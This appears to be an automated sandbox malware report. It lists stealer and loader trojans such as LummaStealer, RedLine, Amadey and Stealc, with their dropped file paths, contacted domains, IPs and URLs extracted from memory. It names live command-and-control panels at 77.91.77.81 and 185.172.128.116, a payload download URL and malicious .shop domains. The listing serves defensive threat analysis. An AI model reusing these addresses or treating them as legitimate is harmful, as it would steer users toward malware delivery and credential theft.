C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\FirstZ[1].exe	82%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lummac2[1].exe	92%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\taskweaker[1].exe	62%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe	100%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\legs[1].exe	100%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\NewLatest[1].exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Installer[1].exe	42%	ReversingLabs	Win64.Trojan.Nekark
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ama[1].exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	82%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	100%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	92%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	42%	ReversingLabs	Win64.Trojan.Nekark
C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	100%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	62%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\AppData\Local\Temp\6.exe	29%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	46%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	96%	ReversingLabs	Win32.Trojan.Amadey

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
pixel.com	0%	Virustotal	Browse
s3-w.us-east-1.amazonaws.com	0%	Virustotal	Browse
bitbucket.org	0%	Virustotal	Browse
moreapp4you.online	0%	Virustotal	Browse
starjod.xyz	0%	Virustotal	Browse
github.com	0%	Virustotal	Browse
bit.ly	1%	Virustotal	Browse
objects.githubusercontent.com	1%	Virustotal	Browse
iplogger.co	4%	Virustotal	Browse
bbuseruploads.s3.amazonaws.com	3%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://ipinfo.io/	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://www.google.com/url?q=https%3A%2F%2Ffindalltechs.xyz%2Fboosting-your-credit-score-a-guide-to-securing-better-loan-rates%2F&sa=D&sntz=1&usg=AOvVaw2c6cV2MOm3tF_tzByuUNer	0%	Avira URL Cloud	safe
conferencefreckewl.shop	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24LR	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	0%	Avira URL Cloud	safe
http://77.91.77.81/Kiru9gu/index.phpY	100%	Avira URL Cloud	phishing
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	Virustotal		Browse
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	0%	Virustotal		Browse
conferencefreckewl.shop	12%	Virustotal		Browse
notoriousdcellkw.shop	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23ResponseD	0%	Avira URL Cloud	safe
http://77.91.77.81/Kiru9gu/index.phpfG1	100%	Avira URL Cloud	phishing
http://77.91.77.81/Kiru9gu/index.phpY	15%	Virustotal		Browse
http://tempuri.org/Entity/Id23ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id24LR	2%	Virustotal		Browse
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdoap.or	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id12Response	0%	Avira URL Cloud	safe
https://disappointcredisotw.shop/api	100%	Avira URL Cloud	malware
http://77.91.77.81/Kiru9gu/index.php	100%	Avira URL Cloud	phishing
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	0%	Virustotal		Browse
http://tempuri.org/	0%	Avira URL Cloud	safe
notoriousdcellkw.shop	12%	Virustotal		Browse
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
https://disappointcredisotw.shop/api	16%	Virustotal		Browse
http://tempuri.org/Entity/Id12Response	2%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
http://77.91.77.81/Kiru9gu/index.php	23%	Virustotal		Browse
http://tempuri.org/	1%	Virustotal		Browse
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	2%	Virustotal		Browse
http://tempuri.org/Entity/Id6ResponseD	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	Virustotal		Browse
barebrilliancedkoso.shop	100%	Avira URL Cloud	malware
http://77.91.77.81/Kiru9gu/index.phpc	100%	Avira URL Cloud	phishing
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd8F0U	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	0%	Virustotal		Browse
http://77.91.77.81/Kiru9gu/index.phpld	100%	Avira URL Cloud	phishing
http://tempuri.org/Entity/Id21Response	4%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	0%	Virustotal		Browse
http://tempuri.org/Entity/Id6ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id13LR	0%	Avira URL Cloud	safe
http://77.91.77.81/Kiru9gu/index.phpc	5%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	0%	Avira URL Cloud	safe
http://185.172.128.116/FirstZ.exe	100%	Avira URL Cloud	malware
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	0%	Virustotal		Browse
http://185.172.128.116/Mb3GvQs8/index.php6r	100%	Avira URL Cloud	phishing
http://185.172.128.116/FirstZ.exe	18%	Virustotal		Browse
barebrilliancedkoso.shop	15%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	Virustotal		Browse
http://tempuri.org/Entity/Id13ResponseD	0%	Avira URL Cloud	safe
http://77.91.77.81/Kiru9gu/index.phps	100%	Avira URL Cloud	phishing
http://tempuri.org/Entity/Id5LR	0%	Avira URL Cloud	safe
http://185.172.128.116/Mb3GvQs8/index.php6r	16%	Virustotal		Browse
http://tempuri.org/Entity/Id13LR	2%	Virustotal		Browse
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
http://77.91.77.81/Kiru9gu/index.phpt	100%	Avira URL Cloud	phishing
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	Avira URL Cloud	safe
https://aui-cdn.atlassian.com/	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Virustotal		Browse
http://tempuri.org/Entity/Id5LR	2%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	Virustotal		Browse
http://77.91.77.81/Kiru9gu/index.phps	3%	Virustotal		Browse
http://tempuri.org/Entity/Id15Response	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id13ResponseD	1%	Virustotal		Browse
https://bitbucket.org	0%	Avira URL Cloud	safe
http://Passport.NET/tb_	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	0%	Avira URL Cloud	safe
https://aui-cdn.atlassian.com/	0%	Virustotal		Browse
https://api.ip.sb/ip	0%	Avira URL Cloud	safe
https://bbuseruploads.s3.amazonaws.com	0%	Avira URL Cloud	safe
http://185.172.128.116/Mb3GvQs8/index.php1mb3JtLXVybGVuY29kZWQ=x	100%	Avira URL Cloud	phishing
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id1ResponseD	0%	Avira URL Cloud	safe
http://www.entrust.net/rpa03	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	0%	Avira URL Cloud	safe
https://account.live.com/msangcwam	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdp&	0%	Avira URL Cloud	safe
http://185.172.128.116/Mb3GvQs8/index.phpQs8/index.php	100%	Avira URL Cloud	phishing
http://crl.ver)	0%	Avira URL Cloud	safe
http://passport.net/tb	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdcLPe	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
https://iplogger.co/favicon.ico	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pixel.com	54.67.42.145	true	false	0%, Virustotal, Browse	unknown
s3-w.us-east-1.amazonaws.com	3.5.27.203	true	false	0%, Virustotal, Browse	unknown
bitbucket.org	104.192.141.1	true	false	0%, Virustotal, Browse	unknown
moreapp4you.online	31.31.196.208	true	false	0%, Virustotal, Browse	unknown
findalltechs.xyz	172.67.214.243	true	true		unknown
starjod.xyz	154.41.249.241	true	true	0%, Virustotal, Browse	unknown
github.com	140.82.121.3	true	true	0%, Virustotal, Browse	unknown
bit.ly	67.199.248.11	true	true	1%, Virustotal, Browse	unknown
comrex.pk	58.65.168.132	true	false		unknown
iplogger.co	172.67.167.249	true	false	4%, Virustotal, Browse	unknown
objects.githubusercontent.com	185.199.111.133	true	false	1%, Virustotal, Browse	unknown
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	3%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
conferencefreckewl.shop	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/url?q=https%3A%2F%2Ffindalltechs.xyz%2Fboosting-your-credit-score-a-guide-to-securing-better-loan-rates%2F&sa=D&sntz=1&usg=AOvVaw2c6cV2MOm3tF_tzByuUNer	false	Avira URL Cloud: safe	unknown
notoriousdcellkw.shop	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://disappointcredisotw.shop/api	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://77.91.77.81/Kiru9gu/index.php	true	23%, Virustotal, Browse Avira URL Cloud: phishing	unknown
barebrilliancedkoso.shop	true	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://iplogger.co/favicon.ico	false	Avira URL Cloud: malware	unknown
https://www.google.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/	false	URL Reputation: safe	unknown
https://pixel.com/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id24LR	RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.91.77.81/Kiru9gu/index.phpY	axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id23ResponseD	ama.exe, 00000004.00000002.2393678580.0000000002B14000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.91.77.81/Kiru9gu/index.phpfG1	axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdoap.or	svchost.exe, 0000001D.00000003.2273862826.0000018F5BD55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id12Response	ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/	ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id2Response	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id21Response	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id6ResponseD	ama.exe, 00000004.00000002.2393678580.0000000002B14000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.91.77.81/Kiru9gu/index.phpc	axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd8F0U	svchost.exe, 0000001D.00000003.2362123651.0000018F5BD82000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.91.77.81/Kiru9gu/index.phpld	axplong.exe, 00000002.00000002.4499679866.0000000005B68000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://tempuri.org/Entity/Id13LR	RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4217201170.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214999799.0000018F5BD6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2325042741.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.116/FirstZ.exe	Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.116/Mb3GvQs8/index.php6r	Hkbsse.exe, 0000000B.00000003.4164013581.0000000000D60000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://tempuri.org/Entity/Id13ResponseD	ama.exe, 00000004.00000002.2393678580.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id5LR	RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.91.77.81/Kiru9gu/index.phps	axplong.exe, 00000002.00000002.4499679866.0000000005B68000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://discord.com/api/v9/users/	RegAsm.exe, 00000017.00000002.2259714119.00000000031D2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.91.77.81/Kiru9gu/index.phpt	axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aui-cdn.atlassian.com/	ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15Response	ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf	svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214925411.0000018F5B450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bitbucket.org	ama.exe, 00000004.00000002.2393678580.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://Passport.NET/tb_	svchost.exe, 0000001D.00000002.4225383542.0000018F5C278000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4220285204.0000018F5B4C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4224343351.0000018F5C251000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
